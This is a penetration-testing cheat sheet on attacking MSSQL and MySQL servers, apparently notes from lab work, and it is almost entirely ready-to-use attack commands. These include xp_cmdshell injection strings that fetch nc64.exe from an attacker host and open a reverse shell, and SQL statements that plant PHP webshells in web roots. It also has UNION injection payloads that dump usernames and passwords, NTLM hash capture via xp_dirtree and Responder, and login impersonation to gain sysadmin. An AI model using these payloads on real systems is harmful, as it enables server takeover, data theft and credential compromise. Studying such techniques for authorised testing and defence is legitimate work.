🛢Attacking SQL

SQLMap

SQLMAP example:

sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3

By default, MSSQL uses ports TCP/1433 and UDP/1434, and MySQL uses TCP/3306. However, when MSSQL operates in a "hidden" mode, it uses the TCP/2433 port.

Connecting to SQL service

To connect to mysql:

mysql -u julio -pPassword123 -h 10.129.20.13

On windows:

sqlcmd -S SRVMSSQL -U julio -P 'MyPassword!' -y 30 -Y 30

To connect to mssql:

sqsh -S 10.129.203.7 -U julio -P 'MyPassword!' -h

-windows-auth for alternative authentication

mssqlclient.py -p 1433 julio@10.129.203.7 

Default Databases

MySQL default system schemas/databases:

• mysql - is the system database that contains tables that store information required by the MySQL server

• information_schema - provides access to database metadata

• performance_schema - is a feature for monitoring MySQL Server execution at a low level

• sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema

MSSQL default system schemas/databases:

• master - keeps the information for an instance of SQL Server.

• msdb - used by SQL Server Agent.

• model - a template database copied for each new database.

• resource - a read-only database that keeps system objects visible in every database on the server in sys schema.

• tempdb - keeps temporary objects for SQL queries.

RCE

MSSQL

For MSSQL on windows we can run any code in SQL injection: To get RCE:

';EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;-- 
';EXEC xp_cmdshell "powershell wget http://<ip>/nc64.exe -o C:\Users\Public\nc64.exe";--
';EXEC xp_cmdshell "C:\Users\Public\nc64.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.245 4444";--

Using Public folder as we know it is writeable by all users.

EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE;
EXEC xp_cmdshell "powershell wget http://<ip>/nc64.exe -o C:\Users\Public\nc64.exe";
EXEC xp_cmdshell "C:\Users\Public\nc64.exe -t -e C:\Windows\System32\cmd.exe <ip> <port>";

MySQL

We can write a php file that will lead to command execution via a Web Application

SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE "/var/www/html/webshell.php"

or with union:

' union select '<?php system($_GET["cmd"]); ?>' into outfile '/srv/http/shell.php' -- -

Windows:

SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE "C:/wamp/www/shell.php" 

Useful Commands

To check C directory:

exec xp_dirtree 'c:\'

To list databases:

Mysql

SHOW DATABASES;

MSSQL

SELECT name FROM master.dbo.sysdatabases

To show tables

MySQL

SHOW TABLES;

MSSQL

SELECT table_name FROM <DATABASE>.INFORMATION_SCHEMA.TABLES

To concatenate columns:

MSSQL

union select 1,concat(username,':',password),3,4,5,6 from users--

To show tables and their id:

union select 1,(select string_agg(concat(name,':',id),'|') from streamio..sysobjects where xtype='u'),3,4,5,6-- -

To test xp_cmdshell:

EXEC xp_cmdshell 'ping 10.10.14.8';

On target:

sudo tcpdump -i tun0 icmp

To Write a file:

SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

Use ?cmd=whoami to use

SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"

To get hash:

Target:

MSSQL

EXEC master..xp_dirtree '\\10.10.14.113\share\'

Attacker:

sudo responder -A -I tun0

Impersonation:

Check users we can impersonate:

SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'

To impersonate:

Use master database

EXECUTE AS LOGIN = 'sa' SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin')

Verifying current user and role:

1> SELECT SYSTEM_USER
2> SELECT IS_SRVROLEMEMBER('sysadmin')
3> go

Linked Database

SELECT srvname, isremote FROM sysservers

Enable xp_cmdshell

EXEC master.dbo.sp_configure 'show advanced options', 1;
RECONFIGURE;